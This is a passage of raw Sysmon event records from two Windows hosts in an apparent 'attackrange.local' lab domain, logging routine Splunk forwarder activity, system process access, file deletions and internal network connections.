Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245667Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:24.223{CB4067E1-51A8-6063-AF22-00000000AF01}3752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001060979Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.992{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA3E31A78EE0521F88AF34371117A0F4,SHA256=CBB0D73E72C54E1CC3AF6692EBDE0499B6B9FC2921595BD413852117989C766F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060978Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.992{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3042A49E2357B1F61190414C3C0C536,SHA256=C9963BD42A1818C9D0B50729CD7C2CA978657B0DFC88D0B21BAC142B1653AB59,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060977Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.992{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51A9-6063-1F01-00000000AF01}2256C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060976Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.992{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060975Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.992{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060974Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.992{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060973Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.992{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060972Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.992{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-51A9-6063-1F01-00000000AF01}2256C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060971Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.992{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51A9-6063-1F01-00000000AF01}2256C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060970Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.994{7F8C56E7-51A9-6063-1F01-00000000AF01}2256C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001060969Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:23.061{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54778-false10.0.1.12-8000- 10341000x80000000000000001060968Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.429{7F8C56E7-51A9-6063-1E01-00000000AF01}208220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060967Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.304{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51A9-6063-1E01-00000000AF01}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060966Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.304{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060965Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.304{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060964Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.304{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060963Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.304{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060962Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.304{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-51A9-6063-1E01-00000000AF01}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001060961Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.304{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51A9-6063-1E01-00000000AF01}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001060960Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:25.306{7F8C56E7-51A9-6063-1E01-00000000AF01}208C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000245697Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:25.925{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB2F083C12D5E181F9F42805903BC023,SHA256=0ABAA4D49E45C37EB3D4036310432C93AB88D4243243CCD130057418D958A905,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245696Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:25.363{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FC06AE2BBA9EF10FE8A98CFD942B929,SHA256=83CBD1DC971F053A618F861C3461302D58FFB0A87FA79085E09EE9A317F23775,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245699Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:25.497{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64764-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245698Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:26.394{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56F88A30DA4655BAA8161F4AEA728F9E,SHA256=17C8D9BD106A2EB3CFAF8B6775879173469BC5BFDB6B2E54D2375DA886F09B71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060980Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:27.367{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E288AAF630DC9F64C81F7C9B4D987A8,SHA256=ACCDF89F8144D39CEC57CB148053F77FB6769778551C8A7772BE4444FD063532,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245700Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:27.410{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6B3C88D46A81BF7729D85C63663F485,SHA256=CB3249F318FE430B6F6F2ADA162925BA007AF8A2FDF7A8687E5D4A5B2EB325C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060981Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:28.758{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E68E701184DB8E51620D91725AAE9788,SHA256=AC1A581C195210E87BB874357CE888557DE78FB7B904E9DDFB5370BD05A30681,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245701Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:28.441{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5237D62DC10E84906C9EA5A1641E113,SHA256=7AFBD0C532581FE5315F4C1F47A08D3E58520EAEB61988A9EF311A13C0A79F9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245702Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:29.441{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=596204F10819EDC284BF4FFB4C3C5236,SHA256=4866E34BDCFCD85F8382FAC2A0BBA90910E8ABDF3F815FD60DB2DAC45B45B0F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060982Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:30.133{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BE63D342F02DBFB149408661C8C2B40,SHA256=6CCDFB62E02B91EF6D5226BE8970B1BCAC835C8FD43AD61AE752E85BC659CBEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245703Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:30.472{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6FA80DF891C0497C1FD5A7234292341,SHA256=209213E4843678C460ACD5228C6A1267DE38911D53993658189DE731878C2939,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001060984Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:28.998{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54779-false10.0.1.12-8000- 23542300x80000000000000001060983Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:28:31.493{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=183EA706B1465E28DA329842564885C3,SHA256=2344A6D73A45F3E825AA9B7C0A079F56ED9EA1A1C353D9228C3529D4CE859389,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245706Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:31.472{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=977B92C3034F37D0C8784A5E7BC03117,SHA256=EB8619683B124942BC9DE026D2537493004F1CFF0677BF568C5EC0FF14A7760E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245705Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:28:31.316{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D378E5DECF25148469E74116BA6AB5D6,SHA256=F42336C9EA791DC70EDBC3316885627F854B9E19B8FB2E85C5046539BE26DC3F,IMPHASH=00000000000000000000000000000000falsetrue 